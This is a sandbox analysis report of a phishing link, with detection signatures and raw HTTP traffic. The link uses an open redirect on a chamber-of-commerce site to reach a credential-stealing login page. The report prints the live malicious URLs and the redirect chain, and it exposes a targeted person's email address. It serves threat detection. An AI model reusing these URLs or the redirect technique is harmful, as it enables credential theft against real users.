Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
https://web.lehighvalleychamber.org/cwt/external/wcpages/referral.aspx?ReferralType=W&ProfileID=5337&ListingID=4065&CategoryID=74&SubCategoryID=0&url=//sanemedia.ca/owaow/yjyo8q/bWFyaWEud29qY2llY2hvd3NraUBjby5tb25tb3V0aC5uai51cw==

Overview

General Information

Sample URL:https://web.lehighvalleychamber.org/cwt/external/wcpages/referral.aspx?ReferralType=W&ProfileID=5337&ListingID=4065&CategoryID=74&SubCategoryID=0&url=//sanemedia.ca/owaow/yjyo8q/bWFyaWEud29qY2llY2hvd3
Analysis ID:1431758
Infos:

Detection

HTMLPhisher
Score:60
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Yara detected HtmlPhish10
HTML page contains suspicious base64 encoded javascript
HTML body contains low number of good links
HTML body contains password input but no form action
HTML page contains hidden URLs or javascript code
HTML title does not match URL
HTTP GET or POST without a user agent
Invalid T&C link found
Stores files to the Windows start menu directory

Classification

  • System is w10x64_ra
  • chrome.exe (PID: 4524 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://web.lehighvalleychamber.org/cwt/external/wcpages/referral.aspx?ReferralType=W&ProfileID=5337&ListingID=4065&CategoryID=74&SubCategoryID=0&url=//sanemedia.ca/owaow/yjyo8q/bWFyaWEud29qY2llY2hvd3NraUBjby5tb25tb3V0aC5uai51cw== MD5: 83395EAB5B03DEA9720F8D7AC0D15CAA)
    • chrome.exe (PID: 5448 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2072 --field-trial-handle=1972,i,5865964949357321470,7222999334076516600,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 83395EAB5B03DEA9720F8D7AC0D15CAA)
  • cleanup
No configs have been found
SourceRuleDescriptionAuthorStrings
3.6.pages.csvJoeSecurity_HtmlPhish_10Yara detected HtmlPhish_10Joe Security
    3.5.pages.csvJoeSecurity_HtmlPhish_10Yara detected HtmlPhish_10Joe Security
      No Sigma rule has matched
      No Snort rule has matched

      Click to jump to signature section

      Show All Signature Results

      AV Detection

      barindex
      Source: https://web.lehighvalleychamber.org/cwt/external/wcpages/referral.aspx?ReferralType=W&ProfileID=5337&ListingID=4065&CategoryID=74&SubCategoryID=0&url=//sanemedia.ca/owaow/yjyo8q/bWFyaWEud29qY2llY2hvd3NraUBjby5tb25tb3V0aC5uai51cw==SlashNext: detection malicious, Label: Credential Stealing type: Phishing & Social Engineering

      Phishing

      barindex
      Source: Yara matchFile source: 3.6.pages.csv, type: HTML
      Source: Yara matchFile source: 3.5.pages.csv, type: HTML
      Source: https://efe.q39r.com/efe/#Xmaria.wojciechowski@co.monmouth.nj.usHTTP Parser: Base64 decoded: <script>
      Source: https://efe.q39r.com/8571576472544462333778VmFvuqqgHOSOUIYLXDGJJKMTFCREDTXYXKXYYKGCLIZVNPFMHJGINBHVI?cbGXAgLMlUOzbXZpUQbIQpEphcjVBYMFBGIONZWCNGREHXQKOLNDMQGHTTP Parser: Number of links: 0
      Source: https://efe.q39r.com/8571576472544462333778VmFvuqqgHOSOUIYLXDGJJKMTFCREDTXYXKXYYKGCLIZVNPFMHJGINBHVI?cbGXAgLMlUOzbXZpUQbIQpEphcjVBYMFBGIONZWCNGREHXQKOLNDMQGHTTP Parser: <input type="password" .../> found but no <form action="...
      Source: https://efe.q39r.com/efe/#Xmaria.wojciechowski@co.monmouth.nj.usHTTP Parser: Base64 decoded: <!DOCTYPE html><html lang="en"><head> <script src="https://code.jquery.com/jquery-3.6.0.min.js"></script> <script src="https://challenges.cloudflare.com/turnstile/v0/api.js?render=explicit"></script> <meta http-equiv="X-UA-Compatible" c...
      Source: https://efe.q39r.com/8571576472544462333778VmFvuqqgHOSOUIYLXDGJJKMTFCREDTXYXKXYYKGCLIZVNPFMHJGINBHVI?cbGXAgLMlUOzbXZpUQbIQpEphcjVBYMFBGIONZWCNGREHXQKOLNDMQGHTTP Parser: Title: ylVjeegzJE does not match URL
      Source: https://efe.q39r.com/8571576472544462333778VmFvuqqgHOSOUIYLXDGJJKMTFCREDTXYXKXYYKGCLIZVNPFMHJGINBHVI?cbGXAgLMlUOzbXZpUQbIQpEphcjVBYMFBGIONZWCNGREHXQKOLNDMQGHTTP Parser: Invalid link: Terms of use
      Source: https://efe.q39r.com/8571576472544462333778VmFvuqqgHOSOUIYLXDGJJKMTFCREDTXYXKXYYKGCLIZVNPFMHJGINBHVI?cbGXAgLMlUOzbXZpUQbIQpEphcjVBYMFBGIONZWCNGREHXQKOLNDMQGHTTP Parser: Invalid link: Privacy & cookies
      Source: https://efe.q39r.com/8571576472544462333778VmFvuqqgHOSOUIYLXDGJJKMTFCREDTXYXKXYYKGCLIZVNPFMHJGINBHVI?cbGXAgLMlUOzbXZpUQbIQpEphcjVBYMFBGIONZWCNGREHXQKOLNDMQGHTTP Parser: Invalid link: Terms of use
      Source: https://efe.q39r.com/8571576472544462333778VmFvuqqgHOSOUIYLXDGJJKMTFCREDTXYXKXYYKGCLIZVNPFMHJGINBHVI?cbGXAgLMlUOzbXZpUQbIQpEphcjVBYMFBGIONZWCNGREHXQKOLNDMQGHTTP Parser: Invalid link: Privacy & cookies
      Source: https://efe.q39r.com/8571576472544462333778VmFvuqqgHOSOUIYLXDGJJKMTFCREDTXYXKXYYKGCLIZVNPFMHJGINBHVI?cbGXAgLMlUOzbXZpUQbIQpEphcjVBYMFBGIONZWCNGREHXQKOLNDMQGHTTP Parser: <input type="password" .../> found
      Source: https://efe.q39r.com/efe/#Xmaria.wojciechowski@co.monmouth.nj.usHTTP Parser: No favicon
      Source: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv0/0/2uyjt/0x4AAAAAAAYIhGTHgfwrnf2u/auto/normalHTTP Parser: No favicon
      Source: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv0/0/2uyjt/0x4AAAAAAAYIhGTHgfwrnf2u/auto/normalHTTP Parser: No favicon
      Source: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv0/0/2uyjt/0x4AAAAAAAYIhGTHgfwrnf2u/auto/normalHTTP Parser: No favicon
      Source: https://efe.q39r.com/8571576472544462333778VmFvuqqgHOSOUIYLXDGJJKMTFCREDTXYXKXYYKGCLIZVNPFMHJGINBHVI?cbGXAgLMlUOzbXZpUQbIQpEphcjVBYMFBGIONZWCNGREHXQKOLNDMQGHTTP Parser: No favicon
      Source: https://efe.q39r.com/8571576472544462333778VmFvuqqgHOSOUIYLXDGJJKMTFCREDTXYXKXYYKGCLIZVNPFMHJGINBHVI?cbGXAgLMlUOzbXZpUQbIQpEphcjVBYMFBGIONZWCNGREHXQKOLNDMQGHTTP Parser: No favicon
      Source: https://efe.q39r.com/8571576472544462333778VmFvuqqgHOSOUIYLXDGJJKMTFCREDTXYXKXYYKGCLIZVNPFMHJGINBHVI?cbGXAgLMlUOzbXZpUQbIQpEphcjVBYMFBGIONZWCNGREHXQKOLNDMQGHTTP Parser: No <meta name="author".. found
      Source: https://efe.q39r.com/8571576472544462333778VmFvuqqgHOSOUIYLXDGJJKMTFCREDTXYXKXYYKGCLIZVNPFMHJGINBHVI?cbGXAgLMlUOzbXZpUQbIQpEphcjVBYMFBGIONZWCNGREHXQKOLNDMQGHTTP Parser: No <meta name="author".. found
      Source: https://efe.q39r.com/8571576472544462333778VmFvuqqgHOSOUIYLXDGJJKMTFCREDTXYXKXYYKGCLIZVNPFMHJGINBHVI?cbGXAgLMlUOzbXZpUQbIQpEphcjVBYMFBGIONZWCNGREHXQKOLNDMQGHTTP Parser: No <meta name="copyright".. found
      Source: https://efe.q39r.com/8571576472544462333778VmFvuqqgHOSOUIYLXDGJJKMTFCREDTXYXKXYYKGCLIZVNPFMHJGINBHVI?cbGXAgLMlUOzbXZpUQbIQpEphcjVBYMFBGIONZWCNGREHXQKOLNDMQGHTTP Parser: No <meta name="copyright".. found
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeDirectory created: C:\Program Files\Google\Chrome\Application\DictionariesJump to behavior
      Source: unknownHTTPS traffic detected: 52.165.165.26:443 -> 192.168.2.17:49728 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 184.31.62.93:443 -> 192.168.2.17:49734 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 184.31.62.93:443 -> 192.168.2.17:49735 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 52.165.165.26:443 -> 192.168.2.17:49784 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 40.126.29.9:443 -> 192.168.2.17:49786 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 13.107.5.88:443 -> 192.168.2.17:49787 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 13.107.21.200:443 -> 192.168.2.17:49790 version: TLS 1.2
      Source: global trafficHTTP traffic detected: GET /ab HTTP/1.1Host: evoke-windowsservices-tas.msedge.netCache-Control: no-store, no-cacheX-PHOTOS-CALLERID: 9NMPJ99VJBWVX-EVOKE-RING: X-WINNEXT-RING: PublicX-WINNEXT-TELEMETRYLEVEL: BasicX-WINNEXT-OSVERSION: 10.0.19045.0X-WINNEXT-APPVERSION: 1.23082.131.0X-WINNEXT-PLATFORM: DesktopX-WINNEXT-CANTAILOR: FalseX-MSEDGE-CLIENTID: {c1afbad7-f7da-40f2-92f9-8846a91d69bd}X-WINNEXT-PUBDEVICEID: dbfen2nYS7HW6ON4OdOknKxxv2CCI5LJBTojzDztjwI=If-None-Match: 2056388360_-1434155563Accept-Encoding: gzip, deflate, br
      Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.200
      Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.200
      Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.200
      Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
      Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
      Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
      Source: unknownTCP traffic detected without corresponding DNS query: 52.165.165.26
      Source: unknownTCP traffic detected without corresponding DNS query: 52.165.165.26
      Source: unknownTCP traffic detected without corresponding DNS query: 52.165.165.26
      Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
      Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.200
      Source: unknownTCP traffic detected without corresponding DNS query: 52.165.165.26
      Source: unknownTCP traffic detected without corresponding DNS query: 52.165.165.26
      Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.200
      Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.200
      Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.200
      Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.200
      Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.200
      Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.200
      Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.200
      Source: unknownTCP traffic detected without corresponding DNS query: 52.165.165.26
      Source: unknownTCP traffic detected without corresponding DNS query: 52.165.165.26
      Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.200
      Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.200
      Source: unknownTCP traffic detected without corresponding DNS query: 52.165.165.26
      Source: unknownTCP traffic detected without corresponding DNS query: 52.165.165.26
      Source: unknownTCP traffic detected without corresponding DNS query: 52.165.165.26
      Source: unknownTCP traffic detected without corresponding DNS query: 52.165.165.26
      Source: unknownTCP traffic detected without corresponding DNS query: 52.165.165.26
      Source: unknownTCP traffic detected without corresponding DNS query: 52.165.165.26
      Source: unknownTCP traffic detected without corresponding DNS query: 52.165.165.26
      Source: unknownTCP traffic detected without corresponding DNS query: 52.165.165.26
      Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.13
      Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.13
      Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
      Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.13
      Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.13
      Source: unknownTCP traffic detected without corresponding DNS query: 184.31.62.93
      Source: unknownTCP traffic detected without corresponding DNS query: 184.31.62.93
      Source: unknownTCP traffic detected without corresponding DNS query: 184.31.62.93
      Source: unknownTCP traffic detected without corresponding DNS query: 184.31.62.93
      Source: unknownTCP traffic detected without corresponding DNS query: 184.31.62.93
      Source: unknownTCP traffic detected without corresponding DNS query: 184.31.62.93
      Source: unknownTCP traffic detected without corresponding DNS query: 184.31.62.93
      Source: unknownTCP traffic detected without corresponding DNS query: 184.31.62.93
      Source: unknownTCP traffic detected without corresponding DNS query: 184.31.62.93
      Source: unknownTCP traffic detected without corresponding DNS query: 184.31.62.93
      Source: unknownTCP traffic detected without corresponding DNS query: 184.31.62.93
      Source: unknownTCP traffic detected without corresponding DNS query: 184.31.62.93
      Source: unknownTCP traffic detected without corresponding DNS query: 184.31.62.93
      Source: global trafficHTTP traffic detected: GET /cwt/external/wcpages/referral.aspx?ReferralType=W&ProfileID=5337&ListingID=4065&CategoryID=74&SubCategoryID=0&url=//sanemedia.ca/owaow/yjyo8q/bWFyaWEud29qY2llY2hvd3NraUBjby5tb25tb3V0aC5uai51cw== HTTP/1.1Host: web.lehighvalleychamber.orgConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /owaow/yjyo8q/bWFyaWEud29qY2llY2hvd3NraUBjby5tb25tb3V0aC5uai51cw== HTTP/1.1Host: sanemedia.caConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentsec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /favicon.ico HTTP/1.1Host: sanemedia.caConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://sanemedia.ca/owaow/yjyo8q/bWFyaWEud29qY2llY2hvd3NraUBjby5tb25tb3V0aC5uai51cw==Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /efe/ HTTP/1.1Host: efe.q39r.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: documentReferer: https://sanemedia.ca/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /jquery-3.6.0.min.js HTTP/1.1Host: code.jquery.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://efe.q39r.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /turnstile/v0/api.js?render=explicit HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://efe.q39r.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /turnstile/v0/b/471dc2adc340/api.js?render=explicit HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://efe.q39r.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv0/0/2uyjt/0x4AAAAAAAYIhGTHgfwrnf2u/auto/normal HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: iframeReferer: https://efe.q39r.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/orchestrate/chl_api/v1?ray=879faccbfe8fb06a HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv0/0/2uyjt/0x4AAAAAAAYIhGTHgfwrnf2u/auto/normalAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/cmg/1/wh0E0SXYnx6pTBdJW%2Fl926I%2BPRUplRdtQz3K9lHXs%2Fs%3D HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv0/0/2uyjt/0x4AAAAAAAYIhGTHgfwrnf2u/auto/normalAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /favicon.ico HTTP/1.1Host: efe.q39r.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://efe.q39r.com/efe/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IkVuTjhpYXZwWDVORVBLMVRKWWJva0E9PSIsInZhbHVlIjoieEdkZ1drMVdXMzNIV2JOSW9iQnBaaVlYcDFXNDBxWjllbm9WWGkzMWlVdlBMaU0rcC9KYkZudkRtcnk4dlEycnVrL1Y2d0hiVW5ZYkRHNEpCemNSMUpYYkJzZ0k2U2JsS1YrSEVrLzlrbDVCMHBoSkpNcTk2cnpjUldSTzcvcVIiLCJtYWMiOiJiMWMzYjljZThiNDcwMmQ0M2E3ZmQ1YTUyYTRjMjJhODc2ZjI1NDU0YzkwYzUyNDIwNWU0ZDNiYTQ3NTA5NzllIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IjlhNTVJWE5STkZJenE5bTlJMGhzV1E9PSIsInZhbHVlIjoia3llOWIyNUR6ZVM0TEZVRE9jL25PZnNLTytUa0ZxQjgyQWk1cUJpVmZOcVg1YmVoMjdWR21ZK3NWbG9zalE1RzJIREZIUUExaXF2L2VxeStySnU2cWxqM1poQWQwazhwbjBLY0d3eUhOUkJIaFJ5NnFWdWVDT1Z4RkJBdWJlKzYiLCJtYWMiOiI5ZjdkNDFmYjFiMmZjMzk2NWNiN2I0MDY0ZjI3NTNhZjZlNGNiYTc2ZDA4ODAyZWJhZDQ4ZGZiODY3ODczMGUwIiwidGFnIjoiIn0%3D
      Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/cmg/1/wh0E0SXYnx6pTBdJW%2Fl926I%2BPRUplRdtQz3K9lHXs%2Fs%3D HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/flow/ov1/1173002416:1714059007:O_UCrCaeb8fNz4-lYcCa6LDflfcxd0RCynsCpjLLiq4/879faccbfe8fb06a/f892c8713b88792 HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/i/879faccbfe8fb06a/1714062180713/RjvXT6k7-qXYQHs HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv0/0/2uyjt/0x4AAAAAAAYIhGTHgfwrnf2u/auto/normalAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/i/879faccbfe8fb06a/1714062180713/RjvXT6k7-qXYQHs HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/pat/879faccbfe8fb06a/1714062180714/7a2eef3f3a2ffe6b8118994333b3f4d3ec1e526af4efd68e8961fa2dd086f191/MGHiH1uFJDsfTgO HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveCache-Control: max-age=0sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv0/0/2uyjt/0x4AAAAAAAYIhGTHgfwrnf2u/auto/normalAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/flow/ov1/1173002416:1714059007:O_UCrCaeb8fNz4-lYcCa6LDflfcxd0RCynsCpjLLiq4/879faccbfe8fb06a/f892c8713b88792 HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=9KOl2MdB5OHyWcF&MD=cOMbbLl7 HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33Host: slscr.update.microsoft.com
      Source: global trafficHTTP traffic detected: GET /fs/windows/config.json HTTP/1.1Connection: Keep-AliveAccept: */*Accept-Encoding: identityIf-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMTRange: bytes=0-2147483646User-Agent: Microsoft BITS/7.8Host: fs.microsoft.com
      Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/flow/ov1/1173002416:1714059007:O_UCrCaeb8fNz4-lYcCa6LDflfcxd0RCynsCpjLLiq4/879faccbfe8fb06a/f892c8713b88792 HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
